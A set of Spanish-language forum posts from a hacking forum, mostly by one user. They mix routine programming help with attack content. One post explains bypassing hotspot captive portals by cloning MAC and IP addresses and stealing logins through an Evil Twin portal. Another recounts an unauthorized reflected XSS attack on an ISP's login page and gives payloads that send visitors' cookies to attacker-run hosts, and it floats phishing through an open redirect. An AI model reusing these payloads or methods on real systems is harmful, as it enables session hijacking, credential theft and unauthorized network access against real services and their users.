Que tal.

Bueno


Por que solo en ese tipo de routers/Aps?

Digo yo que lo que aqui esta primando es la seguridad impuesta en el link layer. O sea, que la seguridad a la hora de Authenticar a los users en ese Hotspot ( da igual el router/AP ) es una kk ( simplemente un portal cautivo ). Ahora si, debido al entramado que supone el implementar 802.1x Auth, se suelen elegir en estos Hotspots solamente un portal cautivo para Authenticacion.

Por ello, clonando la MAC, IP y con el Gateway ( DNs ya han hablado de OpenDNS, aunque puede ser que el router/AP mande info DHCP cuando vea que un user "legitimo" la haya "perdido", ya que con el portal cautivo se ve si un STA es legitimo por si tiene IP, por ello que comentaban lo de clonar tambien la IP.. ).

Tambien suele ocurrir en estos contextos que se le ofrece a los users legitimos/logueados una Subnet diferente que a los no logueados. Por ello, si mediante nmap, kismet, airodump-ng o como sea logramos descubir la Subnet no legitima, pues podemos probar a ponernos una supuesta IP dentro de la subnet de usuarios legitimos asi:

192.168.1.0/24 --> usuarios no autorizados
192.168.2.0/24 --> usuarios autorizados

o

10.0.0.0/24 --> usuarios no autorizados
10.1.1.0/24 --> usuarios autorizados

Cabe mencionar que, en estos contextos, hay mas ataques. Al no haber Authenticacion mutua ( solo se Authentica al STA ), pueden darse ataques via Evil Twin. Cogete una antena direccional, y pondla en tu AP. Clonas el portal cautivo que ofrece el Hotspot legitimo y haz quedate con los logins de los clientes legitimos.
Depende de como hayan pagado pues tendras mas o menos frutos.

Otra cosa es si el Hotspot tuviera una mayor seguridad de capa 2 y proveyese de Authenticacion mutua con encryptacion, 802.1x y RADIUS. Aqui no "podriamos" elaborar los ataques tan facilmente, pues se aniade una de las versiones de EAP conjunto a otros modos de Authenticacion de capa 2 que nos "impedirian" el clonar la IP y MAC. Pero normalmente si hay portal cautivo, es porque se ha querido hacer sencillo.

Por ello, si el Hotspot no usa encryptacion o si la usa ( WEP ..) pero detras de todo ello usa Authenticacion 802.1x ( a parte de la Authenticacion dada por el portal cautivo en este caso :__)) no podremos hacer estos ataques.


Saludos.

Que tal amigos del Hacking Web?!

Bueno, pues resulta que antes de ayer cai en una vulnerabilidad tipo XSS en la pagina de una ISP.

Bien, yo ESTABA LOGUED OUT, y se me ocurrio poner algo como
..vari="><script>alert();</script>

Bien, se ejecuto con ese sencillisimo XSS. Ahi pense .. pero que **** de filtros tiene, no?
Pues nada, me creo un dominio en un Hosting gratuito PHP.
Ahi pues pongo uno de los tipicos scripts en php para robar cookies y para que cree el archivo de texto. Le doy los permisos necesarios y me dirijo de nuevo a la web del ISP..

...vari="><script>document.location='http://myfirst_hosting/mystuff/pred.php?x=' +escape(document.cookie);</script>

Bien, pues nada. Se ve que para mandar por GET si filtraban algo, LOGUED OUT.

Pues hago lo segundo ( creo ! ) que se suele hacer en estos casos para saltar esto. O sea, me creo otro hosting gratuito y ahi pongo mi script en javascript: ( redir.js ):

location.href = 'http://myfirst_hosting.com/mystuff/pred.php?x=' +escape(document.cookie);

Ahora, en la ISP:

...vari="><script src='http://mysecond_hosting/mystuff/redir.js'>

Ahora SI comienzo a recibir las cookies en el archivo de texto que crea el script en php.
El caso es que TODO esto lo hice logued out, asi que las cookies de sesion no las mandaba.
Ahora .. que rayos estaba haciendo?? Tenia que loguearme e intentarlo logueado no??

Pues bien, el caso es que el XSS esta en la pagina de loguin. Una vez que me logueo, si me mando un mail ( por ejemplo ) a mi Inbox ( soy user ) de la ISP y pincho sobre est ( con el <script src > ) ya no funciona.

Se me ocurrio la tonteria de hacer un hipervinculo con el link que te desloguea y despues, en una variable dentro de el link de redireccion de log out redirecciono a la pagina de login con la variable vulnerable pero.. da igual! ya estoy logued off de nuevo y las cookies de sesion ya no se encuentran.

Entonces no habia mas remedio que buscar, una vez logueado, un variable por GET facilona y que me resultara en un XSS. Bien, la encontre pero.. pero los filtros son bien ****.

O sea, los filtros parecen estar ON cuando estoy logueado y
los filtros paracen estar OFF cuando estoy deslogueado..

Pues esa variable via GET, si le introducia pues de nuevo
...vari="><script>aler(213);</script>
no sanizaba ningun metacaracter, por lo cual se producia el alert.

Ahora, de ahi a que pudiera ejecutar otra cosa ( jugar con el DOM para mandarme las cookies, con img src, script src... nada .. ) nada de nada.

He probado mil tipos de saltos de filtros, incluyendo todos los de RSnake!

Esta page tiene intentos de saltos de filtrado curiosos:

http://www.xssing.com/index.php?x=1

Pero nada, encodeando y siempre teniendo en cuenta la posible entrada con ' "><.. ' nada.

Quisiera tomar consejo de los mas experimentados en estos casos y que me dijeran que puede estar ocurriendo ( ya que logued out si, logued on no ) y si hay algun modo de encontrar info que me lo aclare.


Muchas Gracias por vuestra atencion,

averno.


P.D: Suerte.


   /**** MODIFIKO ****/

Y.. no creo que tenga nada que ver con el same domain policy de javascript, ya que no es el caso.

   /**** MODIFIKO2 ****/

Ah... y si Admin/CoAdmins tienen mi IP, pues ya sabran de que page/ISP se trata  

ya siendo un XSS reflejado no tendria por que haber problemas con restricciones de cross-domain policies..

   /**** MODIFIKO3 ****/

Ah, y si es "vulnerable" ( he rozado uno ) a XSRFs, y he pensado alguno que otro. O sea, con la pagina de logout hay una variable "dest" que redirecciona a la pagina que yo quiera ( solo con presionar un link ). Por ello, un mail y phishing estan al alcance proximo ( que no voy ni a empezar a hacerlo ). /* Ya se, no es estrictamente XSRF */

Si le pones en la redireccion una page igual a la de la ISP, y con un "por favor, loguea de nuevo para no perder sesion" o algo asi, poca gente se detendra en que en la URL ha cambiado solo una letra, por ejemplo.
Pero, es que suena tan mal..

Y.. creo que HttpOnly en las cookies no esta definido. Es la impresion que tengo tras haber revisado/sniffado las cookies.... Asi que ( document.cookie ) iria bien aqui..

/* Nota:
Y que pasa con Firefox 3.0.10 .. por que no soporta HttpOnly cookies?? */

http://www.owasp.org/index.php/HTTPOnly

   /**** MODIFIKO4 ****/

Y no me suelo dedicar a estas cosas! Solo de vez en cuando que me aburro y prueba cosas via Web. Todo no va a ser leer, no. Hay q hacer el tonto a veces.

Que tal.

Bueno, gracias por ser agradecido :__).

Primero que todo


esto no mola. A ver, aqui somos todos diferentes. Yo no se mas que nadie, ni por asomo. Algunos del foro simplemente no comparten la idea del altruismo extremo. Yo, soy altruista desde que naci ( creo ) y me gusya ayudar a la gente hasta los extremos. Pero eso no quiere decir que no haya alguien que piense que eso no va a servir para nada a la persona ayudada.

En fin, que no podemos ponernos tan despectivos con otros companieros del foro, no? Claor a no ser que nos insulten y para eso estan los Moderadores/CoAdmins/Admin :___).


Saludos.


   /**** MODIFIKO ****/

Ah, con respecto al script no te deberia de dar fallo alguno usando Bash.
Como dije a SABANDO, haz un
# echo $SHELL

y fijate que la salida sea Bash. Si no, cambia tu shell a bash.

Que tal.

Lo estas haciendo muy bien. Solo se te escapo el simbolo del dolar en la operacion aritmetica. Es asi:

count=0

while [ $count -le 100 ]; do
  echo "[=] count is $count"
  count=$(($count+5))   ## fijate en el $
done


Saludos.

Que tal.

Como dice SCIub no se ve un ******.

Ni yendo a la foto y presionando Ctrl+ ni nada.

Mirate el hilo qu ete ha pasado Bozo de todas maneras. A ver si se te ocurre algo con las cosillas que ahi hay, o ya sabes.. echale una mejor fotito.


Saludos.

Quer tal.

No se si "Filemon" de Sysinternals ( ahora propiedad de mocosoft ) te podría ayudar.


Saludos.

Que tal.

Resulta que hay syscalls como accept() que "bloquean". O sea, hasta que no le llega datos esta "bloqueando" y no se dara ninguna otra accion ya que esta el jodido accept() bloqueando /* read() tambien bloquea */

Para hacerlo "non-blocking" puedes hacer 2 cosas:

- una y menos "efectiva" seria usando la cabecera fcntl.h, y con la funcion fcnt() poner el socket ( descriptor ) en modo non-blocking. Creo que podria ser algo asi:

...
#include <fcntl.h>
...
int sock;
...

fcntl(sock, F_SETFL, O_NONBLOCK);

mirate en Google como poner el socket en modo non-blocking con fcntl().

- Otra y mas efectiva es usando select(). Linux-> man select
o Googlea.



Suerte.

  /**** MODIFIKO ****/

En realidad no se si es esto lo que necesitas, porque a mi parecer no has explicado bien cual es la verdadera raiz de tu problema.

Que tal.

Y un Live C.D de Linux ?


Saludos.

Que tal.

Acabo de ver el video demostrativo y he quedado sorprendido.
Excelente aporte!

Muchas Gracias.

P.D: parece ser una excelente competencia para Burp..

Suerte.

Que tal.

Gracias Anon por la respuesta.

De todos modos ya he podido volver a loguear.


Saludos.